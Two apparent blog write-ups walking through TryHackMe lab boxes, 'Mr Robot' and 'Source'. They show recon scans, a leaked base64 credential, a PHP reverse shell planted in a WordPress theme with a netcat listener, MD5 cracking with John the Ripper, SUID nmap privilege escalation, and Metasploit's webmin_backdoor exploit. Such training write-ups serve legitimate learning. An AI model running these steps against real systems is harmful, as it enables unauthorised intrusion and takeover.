TryHackMe(THM)-Mrrobot Writeup

Ionut — Thu, 21 Apr 2022 13:27:23 +0000

Mr Robot CTF

Based on the Mr. Robot show, can you root this box?
Room link is here link

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

Let’s start the room with basic things.

PORT SCANNING:

nmap -sV -sC -A IP

Port 22 – SSH
Port 80 – http
Port 443 – ssl/http

Now, let's check out the webserver!

With the commands displayed here you can’t do anything which that would be help you.

If you haven’t seen the show yet, I recommend you do not try these commands, as they contain spoilers!

On this page we don’t have any information to help us, so I decided to do a gobuster scan ( directory search ).

gobuster dir -u IP -w /usr/share/wordlists/dirb/common.txt

The first hint for the first question is “Robots”
And we have the directory “robots.txt”

Here is the first KEY!

From this point I've found 2 ways to find the next key:

From the gobuster scan, we found a wordpress admin login page and on /robots.txt is a file “fsocity.dic” -> is a wordlist which we can use to bruteforce wordpress login page (This is a waste of time)
There is another interesting directory -> /license

If we scroll down we find a string in base64

We can decode this on BASE64 DECODER

https://base64.guru/converter/decode/text
ZWxsaW90OkVSMjgtMDY1Mgo= --> elliot:ER28-0652
And easy, we have the credentials for wordpress:

Now the tricky part, and my favourite part of this room
We need to do a reverse shell:
First go to “Appearance” – “Editor” – “Archives”

At this step, we have to replace the code that comes up with the reverse php shell component that we can copy from Github.
PHP REVERSE SHELL

To connect to the shell you have to listen the port 4444 ( or the port you have chosen )
NETCAT

nc -lvnp 4444

And go on IP/wp-content/themes/twentyfifteen/archive.php
to activate the shell.

Wohoo, we have a shell now.

I added:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/anyname.py
python /tmp/anyname.py

to have a stable shell.

The second key is in /home/robot/, but unfortunately we dont have permission to read this.

Luckily there is another file with the password for robot user.

To decrypt this hash we use JohnTheRipper.

echo 'c3fcd3d76192e4007dfb496cca67e13b' > anyfilename
john --format=raw-md5 --wordlist=rockyou.txt anyfilename
john --show --format=RAW-MD5 anyfilename

> ?: abcdefghijklmnopqrstuvwxyz (this is the password)

Now, simply conenct as "robot".

su robot
-and the password is **abcdefghijklmnopqrstuvwxyz**

Now it remains to find the last key that should be in root.
The hint is NMAP

I used

find / -perm -u=s -type f 2>/dev/null

to find all files who have SUID bit set.

And yep, the nmap is here.

GTFOBINS is the best site in my opinion to find how to get root privilege access
LINK
These are the comamnds to obtain root access:

nmap --interactive
nmap> !sh

Finally we found the final key!!!

It's a pretty old challenge, but a very good one. I hope you learned a lot from this writeup.
For any queries, feel free to drop a comment and follow me here for more ctf writeups.

TryHackMe(THM)-Source Writeup

Ionut — Tue, 19 Apr 2022 13:58:40 +0000

SOURCE

Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool.

Room link is here link

Task1

Enumerate and root the box attached to this task. Can you discover the source of the disruption and leverage it to take control?

I'm going to start the challenge by scanning the ip with nmap as in every challenge.
10.10.38.68 -> source.thm

nmap -sV -sC -A source.thm

The output:

Port 22 is for ssh.
Port 10000 is the default port for webmin.

And the link would be:

https://10.10.38.68:10000

Unfortunately we don't know the username and password to ssh and webmin and I tried to search directories with gobuster, but nothing.

gobuster dir -u https://10.10.38.68:10000 -w /usr/share/wordlists/dirb/common.txt

The last option was to look for an exploit on Metasploit.

And yep, there are more vulnerabilities, and the exploit which I used is 5 “exploit/linux/http/webmin_backdoor” .

And now is need to set the LPORT, RHOSTS and ssl to true following these commands:

set RHOSTS 10.10.38.68 (Machine IP)
set LHOST 10.11.61.213 (YOUR IP)
set ssl true

And now, to run the exploit simply type run/exploit.

To have a stable shell run these followings commands:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/anyname.py
python /tmp/anyname.py

And boom!! We have a stable shell
All we need to do now is to find the flags.

DEV Community: Ionut